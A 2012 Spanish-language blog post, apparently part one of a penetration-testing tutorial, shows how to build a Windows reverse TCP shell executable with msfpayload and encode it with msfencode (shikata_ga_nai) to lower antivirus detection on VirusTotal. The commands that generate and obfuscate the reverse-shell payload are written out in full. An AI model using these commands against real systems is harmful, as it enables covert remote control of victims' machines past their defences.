martes, 31 de julio de 2012

Evadiendo antivirus con metasploit - Parte 1

 Anoche releyendo el gran libro "Metasploit: The Penetration Tester's Guide: A Penetration Tester's Guide" me acordé de una herramienta muy útil de esta suite y que no siempre se le da la atención pertinente.
 Esta herramienta es msfencode y su principal utilidad es evitar los antivirus, para ello nos proporciona diversos algoritmos de codificación con el fin de eludir los AV.

  Veamos que algoritmos nos ofrece msfencode para codificar los ejecutables:
msfencode -l

  Antes de utilizar esta herramienta primero crearemos un payload básico utilizando msfpayload y comprobaremos que motores de antivirus lo detectan, para ello utilizaremos la conocida web virustotal:
msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=31337 X > p.exe
y veamos los resultados de virustotal:


 El siguiente paso es generar un payload y codificarlo con msfencode:
msfpayload windows/shell_reverse_tcp LHOST=192.168.1.37 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -t exe -o payload.exe
 Donde:
  • R implica que el payload es generado en raw.
  • -e x86/shikata_ga_nai hace referencia al algoritmo utilizado.
  • -t exe implica que el formato de salida sera un exe.
  • -o payload.exe es el archivo generado ya codificado.
  a lo que virustotal responde:
con lo que vemos un pequeño descenso del indice de detección, pero podemos hacer mas :D .

En la siguiente entrada la segunda parte de msfencode ;).


5 0verl0ad Labs: Evadiendo antivirus con metasploit - Parte 1  Anoche releyendo el gran libro " Metasploit: The Penetration Tester's Guide: A Penetration Tester's Guide " me acordé de ...

No hay comentarios:

< >